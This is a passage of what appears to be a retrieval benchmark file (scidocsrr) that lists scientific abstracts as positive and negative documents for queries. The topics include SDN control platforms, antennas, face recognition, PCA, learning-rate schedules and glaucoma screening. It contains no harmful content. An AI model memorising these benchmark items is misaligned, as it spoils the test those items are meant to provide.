"text": "In this paper, we present the design and implementation of Beehive, a distributed control platform with a simple programming model. In Beehive, control applications are centralized asynchronous message handlers that optionally store their state in dictionaries. Beehive's control platform automatically infers the keys required to process a message, and guarantees that each key is only handled by one light-weight thread of execution (i.e., bee) among all controllers (i.e., hives) in the platform. With that, Beehive transforms a centralized application into a distributed system, while preserving the application's intended behavior. Beehive replicates the dictionaries of control applications consistently through mini-quorums (i.e., colonies), instruments applications at runtime, and dynamically changes the placement of control applications (i.e., live migrates bees) to optimize the control plane. Our implementation of Beehive is open source, high-throughput and capable of fast failovers. We have implemented an SDN controller on top of Beehive that can handle 200K of OpenFlow messages per machine, while persisting and replicating the state of control applications. We also demonstrate that, not only can Beehive tolerate faults, but also it is capable of optimizing control applications after a failure or a change in the workload.",
"title": ""
},
{
"docid": "433340f3392257a8ac830215bf5e3ef2",
"text": "A compact Substrate Integrated Waveguide (SIW) Leaky-Wave Antenna (LWA) is proposed. Internal vias are inserted in the SIW in order to have narrow walls, and so reducing the size of the SIW-LWA, the new structure is called Slow Wave - Substrate Integrated Waveguide - Leaky Wave Antenna (SW-SIW-LWA), since inserting the vias induce the SW effect. After designing the antenna and simulating with HFSS a reduction of 30% of the transverse side of the antenna is attained while maintaining an acceptable gain. Other parameters like the radiation efficiency, Gain, directivity, and radiation pattern are analyzed. Finally a Comparison of our miniaturization technique with Half-Mode Substrate Integrated Waveguide (HMSIW) technique realized in recent articles is done, shows that SW-SIW-LWA technique could be a good candidate for SIW miniaturization.",
"title": ""
},
{
"docid": "02d441c58e7757a4c2f428064dfa756c",
"text": "The prevalence of disordered eating and eating disorders vary from 0-19% in male athletes and 6-45% in female athletes. The objective of this paper is to present an overview of eating disorders in adolescent and adult athletes including: (1) prevalence data; (2) suggested sport- and gender-specific risk factors and (3) importance of early detection, management and prevention of eating disorders. Additionally, this paper presents suggestions for future research which includes: (1) the need for knowledge regarding possible gender-specific risk factors and sport- and gender-specific prevention programmes for eating disorders in sports; (2) suggestions for long-term follow-up for female and male athletes with eating disorders and (3) exploration of a possible male athlete triad.",
"title": ""
},
{
"docid": "83cd04900b09258aa975f44dc2e3649d",
"text": "The transition stage from the natural cognitive decline of normal aging to the more serious decline of dementia is referred to as mild cognitive impairment (MCI). The cognitive changes caused in MCI are noticeable by the individuals experiencing them and by others, but the changes are not severe enough to interfere with daily life or with independent activities. Because there is a thin line between normal aging and MCI, it is difficult for individuals to discern between the two conditions. Moreover, if the symptoms of MCI are not diagnosed in time, it may lead to more serious and permanent conditions. However, if these symptoms are detected in time and proper care and precaution are taken, it is possible to prevent the condition from worsening. A smart-home environment that unobtrusively keeps track of the individual's daily living activities is a possible solution to improve care and quality of life.",
"title": ""
},
{
"docid": "573f12acd3193045104c7d95bbc89f78",
"text": "Automatic Face Recognition is one of the most emphasizing dilemmas in diverse of potential relevance like in different surveillance systems, security systems, authentication or verification of individual like criminals etc. Adjoining of dynamic expression in face causes a broad range of discrepancies in recognition systems. Facial Expression not only exposes the sensation or passion of any person but can also be used to judge his/her mental views and psychosomatic aspects. This paper is based on a complete survey of face recognition conducted under varying facial expressions. In order to analyze different techniques, motion-based, model-based and muscles-based approaches have been used in order to handle the facial expression and recognition catastrophe. The analysis has been completed by evaluating various existing algorithms while comparing their results in general. It also expands the scope for other researchers for answering the question of effectively dealing with such problems.",
"title": ""
},
{
"docid": "9718921e6546abd13e8f08698ba10423",
"text": "LawStats provides quantitative insights into court decisions from the Bundesgerichtshof – Federal Court of Justice (BGH), the Federal Court of Justice in Germany. Using Watson Web Services and approaches from Sentiment Analysis (SA), we can automatically classify the revision outcome and offer statistics on judges, senates, previous instances etc. via faceted search. These statistics are accessible through a open web interface to aid law professionals. With a clear focus on interpretability, users can not only explore statistics, but can also understand, which sentences in the decision are responsible for the machine’s decision; links to the original texts provide more context. This is the first largescale application of Machine Learning (ML) based Natural Language Processing (NLP) for German in the analysis of ordinary court decisions in Germany that we are aware of. We have analyzed over 50,000 court decisions and extracted the outcomes and relevant entities. The modular architecture of the application allows continuous improvements of the ML model as more annotations become available over time. The tool can provide a critical foundation for further quantitative research in the legal domain and can be used as a proof-of-concept for similar efforts.",
"title": ""
},
{
"docid": "ab71df85da9c1798a88b2bb3572bf24f",
"text": "In order to develop an efficient and reliable pulsed power supply for excimer dielectric barrier discharge (DBD) ultraviolet (UV) sources, a pulse generator using Marx topology is adopted. MOSFETs are used as switches. The 12-stage pulse generator operates with a voltage amplitude in the range of 0-5.5 kV. The repetition rate and pulsewidth can be adjusted from 0.1 to 50 kHz and 2 to 20 μs, respectively. It is used to excite KrCl* excilamp, a typical DBD UV source. In order to evaluate the performance of the pulse generator, a sinusoidal voltage power supply dedicated for DBD lamp is also used to excite the KrCl* excilamp. It shows that the lamp excited by the pulse generator has better performance with regard to radiant power and system efficiency. The influence of voltage amplitude, repetition rate, pulsewidth, and rise and fall times on radiant power and system efficiency is investigated using the pulse generator. An inductor is inserted between the pulse generator and the KrCl* excilamp to reduce electromagnetic interference and enhance system reliability.",
"title": ""
},
{
"docid": "b38b1dd4a087c23ff5d152a791dd1b41",
"text": "Absfruct-This paper discusses an approximate solution to the weighted graph matching prohlem (WGMP) for both undirected and directed graphs. The W G M P is the problem of f inding the opt imum matching between two weighted graphs, which are graphs with weights at each arc. The proposed method employs an analytic, instead of a combinatorial or iterative, approach to the opt imum matching problem of such graphs. By using the eigendecomposit ions of the adjacency matrices (in the case of the undirected graph matching problem) or some Hermitian matrices derived from the adjacency matrices (in the case of the directed graph matching problem), a matching close to the opt imum one can be found efficiently when the graphs are sufficiently close to each other. Simulation experiments are also given to evaluate the performance of the proposed method.",
"title": ""
}
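The eigendecomposition approach for the undirected case can be sketched in a few lines, in the style of Umeyama's method: decompose both symmetric adjacency matrices, score node pairs by the product of the absolute eigenvector matrices, and solve the resulting assignment problem. The snippet below is a simplified illustration rather than the paper's exact procedure.

```python
# Sketch of the eigendecomposition approach to undirected weighted graph matching:
# match nodes via the absolute eigenvector matrices of the two symmetric adjacency
# matrices, then solve the resulting assignment problem with the Hungarian algorithm.
import numpy as np
from scipy.optimize import linear_sum_assignment

def match_graphs(A, B):
    """A, B: symmetric weighted adjacency matrices of the same size.
    Returns perm such that node i of graph A is matched to node perm[i] of graph B."""
    _, Ua = np.linalg.eigh(A)
    _, Ub = np.linalg.eigh(B)
    score = np.abs(Ua) @ np.abs(Ub).T          # node-to-node similarity
    rows, cols = linear_sum_assignment(-score) # maximize total similarity
    return cols

rng = np.random.default_rng(0)
A = rng.random((6, 6)); A = (A + A.T) / 2; np.fill_diagonal(A, 0)
true_perm = rng.permutation(6)
P = np.eye(6)[true_perm]
B = P.T @ A @ P                                # B is A with node i relabelled to true_perm[i]
print("recovered:", match_graphs(A, B))
print("ground truth:", true_perm)
```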
] | scidocsrr |
b27d6d9e2b150e05e6aae7522b66b5b4 | Transfiguring portraits | [
{
"docid": "57ccc061377399b669d5ece668b7e030",
"text": "We present a method for the real-time transfer of facial expressions from an actor in a source video to an actor in a target video, thus enabling the ad-hoc control of the facial expressions of the target actor. The novelty of our approach lies in the transfer and photorealistic re-rendering of facial deformations and detail into the target video in a way that the newly-synthesized expressions are virtually indistinguishable from a real video. To achieve this, we accurately capture the facial performances of the source and target subjects in real-time using a commodity RGB-D sensor. For each frame, we jointly fit a parametric model for identity, expression, and skin reflectance to the input color and depth data, and also reconstruct the scene lighting. For expression transfer, we compute the difference between the source and target expressions in parameter space, and modify the target parameters to match the source expressions. A major challenge is the convincing re-rendering of the synthesized target face into the corresponding video stream. This requires a careful consideration of the lighting and shading design, which both must correspond to the real-world environment. We demonstrate our method in a live setup, where we modify a video conference feed such that the facial expressions of a different person (e.g., translator) are matched in real-time.",
"title": ""
},
{
"docid": "e7a0a9e31bba0eec8bf598c5e9eefe6b",
"text": "Stylizing photos, to give them an antique or artistic look, has become popular in recent years. The available stylization filters, however, are usually created manually by artists, resulting in a narrow set of choices. Moreover, it can be difficult for the user to select a desired filter, since the filters’ names often do not convey their functions. We investigate an approach to photo filtering in which the user provides one or more keywords, and the desired style is defined by the set of images returned by searching the web for those keywords. Our method clusters the returned images, allows the user to select a cluster, then stylizes the user’s photos by transferring vignetting, color, and local contrast from that cluster. This approach vastly expands the range of available styles, and gives each filter a meaningful name by default. We demonstrate that our method is able to robustly transfer a wide range of styles from image collections to users’ photos.",
"title": ""
},
{
"docid": "225204d66c371372debb3bb2a37c795b",
"text": "We present two novel methods for face verification. Our first method - “attribute” classifiers - uses binary classifiers trained to recognize the presence or absence of describable aspects of visual appearance (e.g., gender, race, and age). Our second method - “simile” classifiers - removes the manual labeling required for attribute classification and instead learns the similarity of faces, or regions of faces, to specific reference people. Neither method requires costly, often brittle, alignment between image pairs; yet, both methods produce compact visual descriptions, and work on real-world images. Furthermore, both the attribute and simile classifiers improve on the current state-of-the-art for the LFW data set, reducing the error rates compared to the current best by 23.92% and 26.34%, respectively, and 31.68% when combined. For further testing across pose, illumination, and expression, we introduce a new data set - termed PubFig - of real-world images of public figures (celebrities and politicians) acquired from the internet. This data set is both larger (60,000 images) and deeper (300 images per individual) than existing data sets of its kind. Finally, we present an evaluation of human performance.",
"title": ""
},
{
"docid": "ca8010546d4e9ae495de8f9fecb85a43",
"text": "We study the problem of matching photos of a person to paintings of that person, in order to retrieve similar paintings given a query photo. This is challenging as paintings span many media (oil, ink, watercolor) and can vary tremendously in style (caricature, pop art, minimalist). We make the following contributions: (i) we show that, depending on the face representation used, performance can be improved substantially by learning – either by a linear projection matrix common across identities, or by a per-identity classifier. We compare Fisher Vector and Convolutional Neural Network representations for this task; (ii) we introduce new datasets for learning and evaluating this problem; (iii) we also consider the reverse problem of retrieving photos from a large corpus given a painting; and finally, (iv) using the learnt descriptors, we show that, given a photo of a person, we are able to find their doppelgänger in a large dataset of oil paintings, and how this result can be varied by modifying attributes (e.g. frowning, old looking).",
"title": ""
}
] | [
{
"docid": "c475f6a9868cdef2de8ee691b5fce00d",
"text": "Deep networks have recently been shown to be vulnerable to universal perturbations: there exist very small image-agnostic perturbations that cause most natural images to be misclassified by such classifiers. In this paper, we propose a quantitative analysis of the robustness of classifiers to universal perturbations, and draw a formal link between the robustness to universal perturbations, and the geometry of the decision boundary. Specifically, we establish theoretical bounds on the robustness of classifiers under two decision boundary models (flat and curved models). We show in particular that the robustness of deep networks to universal perturbations is driven by a key property of their curvature: there exists shared directions along which the decision boundary of deep networks is systematically positively curved. Under such conditions, we prove the existence of small universal perturbations. Our analysis further provides a novel geometric method for computing universal perturbations, in addition to explaining their properties.",
"title": ""
},
{
"docid": "3bba773dc33ef83b975dd15803fac957",
"text": "In competitive games where players' skill levels are mis-matched, the play experience can be unsatisfying for both stronger and weaker players. Player balancing provides assistance for less-skilled players in order to make games more competitive and engaging. Although player balancing can be seen in many real-world games, there is little work on the design and effectiveness of these techniques outside of shooting games. In this paper we provide new knowledge about player balancing in the popular and competitive rac-ing genre. We studied issues of noticeability and balancing effectiveness in a prototype racing game, and tested the effects of several balancing techniques on performance and play experience. The techniques significantly improved the balance of player performance, were preferred by both experts and novices, increased novices' feelings of competi-tiveness, and did not detract from experts' experience. Our results provide new understanding of the design and use of player balancing for racing games, and provide novel tech-niques that can also be applied to other genres.",
"title": ""
},
{
"docid": "97e33cc9da9cb944c27d93bb4c09ef3d",
"text": "Synchrophasor devices guarantee situation awareness for real-time monitoring and operational visibility of the smart grid. With their widespread implementation, significant challenges have emerged, especially in communication, data quality and cybersecurity. The existing literature treats these challenges as separate problems, when in reality, they have a complex interplay. This paper conducts a comprehensive review of quality and cybersecurity challenges for synchrophasors, and identifies the interdependencies between them. It also summarizes different methods used to evaluate the dependency and surveys how quality checking methods can be used to detect potential cyberattacks. In doing so, this paper serves as a starting point for researchers entering the fields of synchrophasor data analytics and security.",
"title": ""
},
{
"docid": "f1af321a5d7c2e738c181373d5dbfc9a",
"text": "This research examined how motivation (perceived control, intrinsic motivation, and extrinsic motivation), cognitive learning strategies (deep and surface strategies), and intelligence jointly predict long-term growth in students' mathematics achievement over 5 years. Using longitudinal data from six annual waves (Grades 5 through 10; Mage = 11.7 years at baseline; N = 3,530), latent growth curve modeling was employed to analyze growth in achievement. Results showed that the initial level of achievement was strongly related to intelligence, with motivation and cognitive strategies explaining additional variance. In contrast, intelligence had no relation with the growth of achievement over years, whereas motivation and learning strategies were predictors of growth. These findings highlight the importance of motivation and learning strategies in facilitating adolescents' development of mathematical competencies.",
"title": ""
},
{
"docid": "4f60b7c7483ec68804caa3ccdd488c50",
"text": "We propose an online, end-to-end, neural generative conversational model for open-domain dialog. It is trained using a unique combination of offline two-phase supervised learning and online human-inthe-loop active learning. While most existing research proposes offline supervision or hand-crafted reward functions for online reinforcement, we devise a novel interactive learning mechanism based on a diversity-promoting heuristic for response generation and one-character userfeedback at each step. Experiments show that our model inherently promotes the generation of meaningful, relevant and interesting responses, and can be used to train agents with customized personas, moods and conversational styles.",
"title": ""
},
{
"docid": "2a45f4ed21d9534a937129532cb32020",
"text": "BACKGROUND\nCore stability training has grown in popularity over 25 years, initially for back pain prevention or therapy. Subsequently, it developed as a mode of exercise training for health, fitness and sport. The scientific basis for traditional core stability exercise has recently been questioned and challenged, especially in relation to dynamic athletic performance. Reviews have called for clarity on what constitutes anatomy and function of the core, especially in healthy and uninjured people. Clinical research suggests that traditional core stability training is inappropriate for development of fitness for heath and sports performance. However, commonly used methods of measuring core stability in research do not reflect functional nature of core stability in uninjured, healthy and athletic populations. Recent reviews have proposed a more dynamic, whole body approach to training core stabilization, and research has begun to measure and report efficacy of these modes training. The purpose of this study was to assess extent to which these developments have informed people currently working and participating in sport.\n\n\nMETHODS\nAn online survey questionnaire was developed around common themes on core stability training as defined in the current scientific literature and circulated to a sample population of people working and participating in sport. Survey results were assessed against key elements of the current scientific debate.\n\n\nRESULTS\nPerceptions on anatomy and function of the core were gathered from a representative cohort of athletes, coaches, sports science and sports medicine practitioners (n = 241), along with their views on effectiveness of various current and traditional exercise training modes. Most popular method of testing and measuring core function was subjective assessment through observation (43%), while a quarter (22%) believed there was no effective method of measurement. Perceptions of people in sport reflect the scientific debate, and practitioners have adopted a more functional approach to core stability training. There was strong support for loaded, compound exercises performed upright, compared to moderate support for traditional core stability exercises. Half of the participants (50%) in the survey, however, still support a traditional isolation core stability training.\n\n\nCONCLUSION\nPerceptions in applied practice on core stability training for dynamic athletic performance are aligned to a large extent to the scientific literature.",
"title": ""
},
{
"docid": "b4d7974ca20b727e8c361826f24861d4",
"text": "We introduce gvnn, a neural network library in Torch aimed towards bridging the gap between classic geometric computer vision and deep learning. Inspired by the recent success of Spatial Transformer Networks, we propose several new layers which are often used as parametric transformations on the data in geometric computer vision. These layers can be inserted within a neural network much in the spirit of the original spatial transformers and allow backpropagation to enable end-toend learning of a network involving any domain knowledge in geometric computer vision. This opens up applications in learning invariance to 3D geometric transformation for place recognition, end-to-end visual odometry, depth estimation and unsupervised learning through warping with a parametric transformation for image reconstruction error.",
"title": ""
},
{
"docid": "56205e79e706e05957cb5081d6a8348a",
"text": "Corpus-based set expansion (i.e., finding the “complete” set of entities belonging to the same semantic class, based on a given corpus and a tiny set of seeds) is a critical task in knowledge discovery. It may facilitate numerous downstream applications, such as information extraction, taxonomy induction, question answering, and web search. To discover new entities in an expanded set, previous approaches either make one-time entity ranking based on distributional similarity, or resort to iterative pattern-based bootstrapping. The core challenge for these methods is how to deal with noisy context features derived from free-text corpora, which may lead to entity intrusion and semantic drifting. In this study, we propose a novel framework, SetExpan, which tackles this problem, with two techniques: (1) a context feature selection method that selects clean context features for calculating entity-entity distributional similarity, and (2) a ranking-based unsupervised ensemble method for expanding entity set based on denoised context features. Experiments on three datasets show that SetExpan is robust and outperforms previous state-of-the-art methods in terms of mean average precision.",
"title": ""
},
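A greatly simplified sketch of the core SetExpan idea, namely selecting clean context features from the seeds and ranking candidate entities over those features only, is given below. The toy entities, contexts, and counts are invented for illustration, and the iterative expansion and ranking ensemble of the full method are omitted.

```python
# Greatly simplified sketch of corpus-based set expansion in the spirit of SetExpan:
# select context features strongly associated with the seeds, then rank the remaining
# entities by similarity to the seed centroid computed over those features only.
import numpy as np

entities = ["illinois", "texas", "ohio", "toyota", "honda", "chicago"]
contexts = ["state of __", "__ governor", "__ motors", "car maker __", "city of __"]
# Toy entity-context co-occurrence counts (rows: entities, cols: contexts).
M = np.array([[9, 7, 0, 0, 1],
              [8, 6, 0, 0, 0],
              [7, 5, 0, 0, 1],
              [0, 0, 6, 8, 0],
              [0, 0, 5, 7, 0],
              [1, 0, 0, 0, 9]], dtype=float)

def expand(seed_idx, top_features=2, top_entities=2):
    X = M / (M.sum(axis=1, keepdims=True) + 1e-9)        # row-normalized context profiles
    feat_score = X[seed_idx].sum(axis=0)                  # association with the seeds
    keep = np.argsort(-feat_score)[:top_features]         # "denoised" context features
    Xs = X[:, keep]
    centroid = Xs[seed_idx].mean(axis=0)
    sims = Xs @ centroid / (np.linalg.norm(Xs, axis=1) * np.linalg.norm(centroid) + 1e-9)
    candidates = [i for i in np.argsort(-sims) if i not in seed_idx]
    return [entities[i] for i in candidates[:top_entities]]

print(expand(seed_idx=[0, 1]))   # seeds: illinois, texas -> expect ohio near the top
```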
{
"docid": "48a3c9d1f41f9b7ed28f8ef46b5c4533",
"text": "We introduce two new methods of deriving the classical PCA in the framework of minimizing the mean square error upon performing a lower-dimensional approximation of the data. These methods are based on two forms of the mean square error function. One of the novelties of the presented methods is that the commonly employed process of subtraction of the mean of the data becomes part of the solution of the optimization problem and not a pre-analysis heuristic. We also derive the optimal basis and the minimum error of approximation in this framework and demonstrate the elegance of our solution in comparison with a recent solution in the framework.",
"title": ""
},
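The minimum mean-square-error view of PCA described above can be verified numerically: the optimal offset is the data mean, the optimal rank-k basis consists of the top-k covariance eigenvectors, and the attained error equals the sum of the discarded eigenvalues. A small sketch, assuming nothing beyond standard linear algebra routines:

```python
# Sketch of PCA as the minimum mean-square-error lower-dimensional approximation.
import numpy as np

def pca_approx(X, k):
    """Return the rank-k approximation of X (rows = samples), its MSE, and the eigenvalues."""
    mu = X.mean(axis=0)                       # optimal offset (the data mean)
    Xc = X - mu
    C = Xc.T @ Xc / X.shape[0]                # covariance matrix
    eigvals, eigvecs = np.linalg.eigh(C)      # eigenvalues in ascending order
    W = eigvecs[:, -k:]                       # top-k principal directions
    X_hat = mu + (Xc @ W) @ W.T               # project and reconstruct
    mse = np.mean(np.sum((X - X_hat) ** 2, axis=1))
    return X_hat, mse, eigvals

rng = np.random.default_rng(1)
X = rng.normal(size=(500, 5)) @ rng.normal(size=(5, 5))   # correlated 5-D data
X_hat, mse, eigvals = pca_approx(X, k=2)
# The minimum achievable error equals the sum of the discarded (smallest) eigenvalues.
print(round(mse, 6), round(eigvals[:-2].sum(), 6))
```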
{
"docid": "83bdb6760483dd5f5ad45725cd61b7e7",
"text": "Gaucher disease (GD, ORPHA355) is a rare, autosomal recessive genetic disorder. It is caused by a deficiency of the lysosomal enzyme, glucocerebrosidase, which leads to an accumulation of its substrate, glucosylceramide, in macrophages. In the general population, its incidence is approximately 1/40,000 to 1/60,000 births, rising to 1/800 in Ashkenazi Jews. The main cause of the cytopenia, splenomegaly, hepatomegaly, and bone lesions associated with the disease is considered to be the infiltration of the bone marrow, spleen, and liver by Gaucher cells. Type-1 Gaucher disease, which affects the majority of patients (90% in Europe and USA, but less in other regions), is characterized by effects on the viscera, whereas types 2 and 3 are also associated with neurological impairment, either severe in type 2 or variable in type 3. A diagnosis of GD can be confirmed by demonstrating the deficiency of acid glucocerebrosidase activity in leukocytes. Mutations in the GBA1 gene should be identified as they may be of prognostic value in some cases. Patients with type-1 GD-but also carriers of GBA1 mutation-have been found to be predisposed to developing Parkinson's disease, and the risk of neoplasia associated with the disease is still subject to discussion. Disease-specific treatment consists of intravenous enzyme replacement therapy (ERT) using one of the currently available molecules (imiglucerase, velaglucerase, or taliglucerase). Orally administered inhibitors of glucosylceramide biosynthesis can also be used (miglustat or eliglustat).",
"title": ""
},
{
"docid": "f0bc66d306f0c08f09798b210cbcab73",
"text": "the identification of eye diseases in retinal image is the subject of several researches in the field of medical image processing. this research proposed a computerized aid diagnosis system to help specialists by displaying useful information such as the location of abnormalities in fundus images This paper is a survey of techniques for Automatic detection of retina image now a days it is plying a vital role in screening tool. This procedure helps to detect various kind of risks and diseases of eyes. Identification of Glaucoma using fundus images involves the measurement of the size, shape of the Optic cup and Neuroretinal rim One of the most common diseases which cause blindness is glaucoma. Early detection of this disease is essential to prevent the permanent blindness. Screenings of glaucoma based on digital images of the retina have been performed in the past few years. Several techniques are there to detect the anomaly of retina due to glaucoma. The key image processing techniques are image registration, image fusion, image segmentation, feature extraction, image enhancement, morphology, pattern matching, image classification, analysis and statistical measurements. The main idea behind this paper is to illustrate a system which is mainly based on image processing and classification techniques for automatic detection of glaucoma by comparing and measuring different parameters of fundus images of glaucoma patients and normal patients. Keywords—Glaucoma, Cup to disk ratio, Neuroretinalrim Fundus Image, ISNT (inferior, superior, nasal, temporal quadrants), ANN, K-Means Clustering, Thresholding, CDR, ISNT, SVM, Bayesian.",
"title": ""
},
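Two of the measurements mentioned above, the cup-to-disc ratio and the vertical extents of cup and disc, are easy to compute once segmentation masks are available. The sketch below assumes the optic disc and cup have already been segmented; the toy masks and the rough 0.5 suspicion threshold in the comment are illustrative assumptions.

```python
# Illustrative sketch of cup-to-disc ratio (CDR) measurements used in glaucoma
# screening, computed from already-segmented binary masks. Segmentation itself
# (thresholding, clustering, etc.) is assumed to be done elsewhere.
import numpy as np

def cup_to_disc_ratio(disc_mask: np.ndarray, cup_mask: np.ndarray) -> float:
    """Area-based CDR; values above roughly 0.5 are often treated as suspicious."""
    return cup_mask.sum() / max(disc_mask.sum(), 1)

def vertical_cdr(disc_mask: np.ndarray, cup_mask: np.ndarray) -> float:
    """Vertical CDR: ratio of the vertical extents of cup and disc."""
    def height(mask):
        rows = np.where(mask.any(axis=1))[0]
        return (rows.max() - rows.min() + 1) if rows.size else 0
    return height(cup_mask) / max(height(disc_mask), 1)

# Toy circular masks standing in for a segmented optic disc and cup.
yy, xx = np.mgrid[0:200, 0:200]
disc = ((yy - 100) ** 2 + (xx - 100) ** 2) <= 80 ** 2
cup = ((yy - 100) ** 2 + (xx - 100) ** 2) <= 45 ** 2
print("area CDR:", round(cup_to_disc_ratio(disc, cup), 3))
print("vertical CDR:", round(vertical_cdr(disc, cup), 3))
```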
{
"docid": "01d90d3bc978c7f97b47adb75df475d3",
"text": "It is known that the learning rate is the most important hyper-parameter to tune for training deep neural networks. This paper describes a new method for setting the learning rate, named cyclical learning rates, which practically eliminates the need to experimentally find the best values and schedule for the global learning rates. Instead of monotonically decreasing the learning rate, this method lets the learning rate cyclically vary between reasonable boundary values. Training with cyclical learning rates instead of fixed values achieves improved classification accuracy without a need to tune and often in fewer iterations. This paper also describes a simple way to estimate \"reasonable bounds\" – linearly increasing the learning rate of the network for a few epochs. In addition, cyclical learning rates are demonstrated on the CIFAR-10 and CIFAR-100 datasets with ResNets, Stochastic Depth networks, and DenseNets, and the ImageNet dataset with the AlexNet and GoogLeNet architectures. These are practical tools for everyone who trains neural networks.",
"title": ""
},
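The triangular schedule at the heart of cyclical learning rates is simple enough to state in a few lines. The sketch below follows the commonly cited triangular policy; the base/maximum rates and step size are placeholders that would normally come from the short "LR range test" the abstract describes.

```python
# Sketch of a triangular cyclical learning rate schedule: the rate sweeps linearly
# between base_lr and max_lr and back over each cycle instead of staying fixed.
def triangular_clr(iteration, base_lr=1e-4, max_lr=1e-2, step_size=2000):
    """Return the learning rate to use at a given training iteration."""
    cycle = iteration // (2 * step_size)
    x = abs(iteration / step_size - 2 * cycle - 1)   # position within the cycle: 1 -> 0 -> 1
    return base_lr + (max_lr - base_lr) * max(0.0, 1.0 - x)

# A full cycle spans 2 * step_size iterations: up for step_size, then down for step_size.
for it in (0, 1000, 2000, 3000, 4000):
    print(it, round(triangular_clr(it), 5))
# 0 -> base_lr, 2000 -> max_lr, 4000 -> back to base_lr
```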
{
"docid": "fc431a3c46bdd4fa4ad83b9af10c0922",
"text": "The importance of the kidney's role in glucose homeostasis has gained wider understanding in recent years. Consequently, the development of a new pharmacological class of anti-diabetes agents targeting the kidney has provided new treatment options for the management of type 2 diabetes mellitus (T2DM). Sodium glucose co-transporter type 2 (SGLT2) inhibitors, such as dapagliflozin, canagliflozin, and empagliflozin, decrease renal glucose reabsorption, which results in enhanced urinary glucose excretion and subsequent reductions in plasma glucose and glycosylated hemoglobin concentrations. Modest reductions in body weight and blood pressure have also been observed following treatment with SGLT2 inhibitors. SGLT2 inhibitors appear to be generally well tolerated, and have been used safely when given as monotherapy or in combination with other oral anti-diabetes agents and insulin. The risk of hypoglycemia is low with SGLT2 inhibitors. Typical adverse events appear to be related to the presence of glucose in the urine, namely genital mycotic infection and lower urinary tract infection, and are more often observed in women than in men. Data from long-term safety studies with SGLT2 inhibitors and from head-to-head SGLT2 inhibitor comparator studies are needed to fully determine their benefit-risk profile, and to identify any differences between individual agents. However, given current safety and efficacy data, SGLT2 inhibitors may present an attractive option for T2DM patients who are failing with metformin monotherapy, especially if weight is part of the underlying treatment consideration.",
"title": ""
},
{
"docid": "3ec26d404b5aaa5636c995e188ae6b52",
"text": "This paper presents a study of using ellipsoidal decision regions for motif-based patterned fabric defect detection, the result of which is found to improve the original detection success using max–min decision region of the energy-variance values. In our previous research, max–min decision region was found to be effective in distinct cases but ill detect the ambiguous false-positive and false-negative cases. To alleviate this problem, we first assume that the energy-variance values can be described by a Gaussian mixture model. Second, we apply k-means clustering to roughly identify the various clusters that make up the entire data population. Third, convex hull of each cluster is employed as a basis for fitting an ellipsoidal decision region over it. Defect detection is then based on these ellipsoidal regions. To validate the method, three wallpaper groups are evaluated using the new ellipsoidal regions, and compared with those results obtained using the max–min decision region. For the p2 group, success rate improves from 93.43% to 100%. For the pmm group, success rate improves from 95.9% to 96.72%, while the p4 m group records the same success rate at 90.77%. This demonstrates the superiority of using ellipsoidal decision regions in motif-based defect detection. & 2009 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "faa1a49f949d5ba997f4285ef2e708b2",
"text": "Appendiceal mucinous neoplasms sometimes present with peritoneal dissemination, which was previously a lethal condition with a median survival of about 3 years. Traditionally, surgical treatment consisted of debulking that was repeated until no further benefit could be achieved; systemic chemotherapy was sometimes used as a palliative option. Now, visible disease tends to be removed through visceral resections and peritonectomy. To avoid entrapment of tumour cells at operative sites and to destroy small residual mucinous tumour nodules, cytoreductive surgery is combined with intraperitoneal chemotherapy with mitomycin at 42 degrees C. Fluorouracil is then given postoperatively for 5 days. If the mucinous neoplasm is minimally invasive and cytoreduction complete, these treatments result in a 20-year survival of 70%. In the absence of a phase III study, this new combined treatment should be regarded as the standard of care for epithelial appendiceal neoplasms and pseudomyxoma peritonei syndrome.",
"title": ""
},
{
"docid": "a1196d8624026339f66e843df68469d0",
"text": "Two or more isoforms of several cytokines including tumor necrosis factors (tnfs) have been reported from teleost fish. Although zebrafish (Danio rerio) and medaka (Oryzias latipes) possess two tnf-α genes, their genomic location and existence are yet to be described and confirmed. Therefore, we conducted in silico identification, synteny analysis of tnf-α and tnf-n from both the fish with that of human TNF/lymphotoxin loci and their expression analysis in zebrafish. We identified two homologs of tnf-α (named as tnf-α1 and tnf-α2) and a tnf-n gene from zebrafish and medaka. Genomic location of these genes was found to be as: tnf-α1, and tnf-n and tnf-α2 genes on zebrafish chromosome 19 and 15 and medaka chromosome 11 and 16, respectively. Several features such as existence of TNF family signature, conservation of genes in TNF loci with human chromosome, phylogenetic clustering and amino acid similarity with other teleost TNFs confirmed their identity as tnf-α and tnf-n. There were a constitutive expression of all three genes in different tissues, and an increased expression of tnf-α1 and -α2 and a varied expression of tnf-n ligand in zebrafish head kidney cells induced with 20 μg mL(-1) LPS in vitro. Our results suggest the presence of two tnf-α homologs on different chromosomes of zebrafish and medaka and correlate this incidence arising from the fish whole genome duplication event.",
"title": ""
},
{
"docid": "8609f49cc78acc1ba25e83c8e68040a6",
"text": "Time series shapelets are small, local patterns in a time series that are highly predictive of a class and are thus very useful features for building classifiers and for certain visualization and summarization tasks. While shapelets were introduced only recently, they have already seen significant adoption and extension in the community. Despite their immense potential as a data mining primitive, there are two important limitations of shapelets. First, their expressiveness is limited to simple binary presence/absence questions. Second, even though shapelets are computed offline, the time taken to compute them is significant. In this work, we address the latter problem by introducing a novel algorithm that finds shapelets in less time than current methods by an order of magnitude. Our algorithm is based on intelligent caching and reuse of computations, and the admissible pruning of the search space. Because our algorithm is so fast, it creates an opportunity to consider more expressive shapelet queries. In particular, we show for the first time an augmented shapelet representation that distinguishes the data based on conjunctions or disjunctions of shapelets. We call our novel representation Logical-Shapelets. We demonstrate the efficiency of our approach on the classic benchmark datasets used for these problems, and show several case studies where logical shapelets significantly outperform the original shapelet representation and other time series classification techniques. We demonstrate the utility of our ideas in domains as diverse as gesture recognition, robotics, and biometrics.",
"title": ""
},
{
"docid": "012e08734efe6af83faef4703a092b16",
"text": "Dunlap and Van Liere’s New Environmental Paradigm (NEP) Scale, published in 1978, has become a widely used measure of proenvironmental orientation. This article develops a revised NEP Scale designed to improve upon the original one in several respects: (1) It taps a wider range of facets of an ecological worldview, (2) It offers a balanced set of proand anti-NEP items, and (3) It avoids outmoded terminology. The new scale, termed the New Ecological Paradigm Scale, consists of 15 items. Results of a 1990 Washington State survey suggest that the items can be treated as an internally consistent summated rating scale and also indicate a modest growth in pro-NEP responses among Washington residents over the 14 years since the original study.",
"title": ""
},
{
"docid": "94a2c522f65627eb36e8dd0b56db5461",
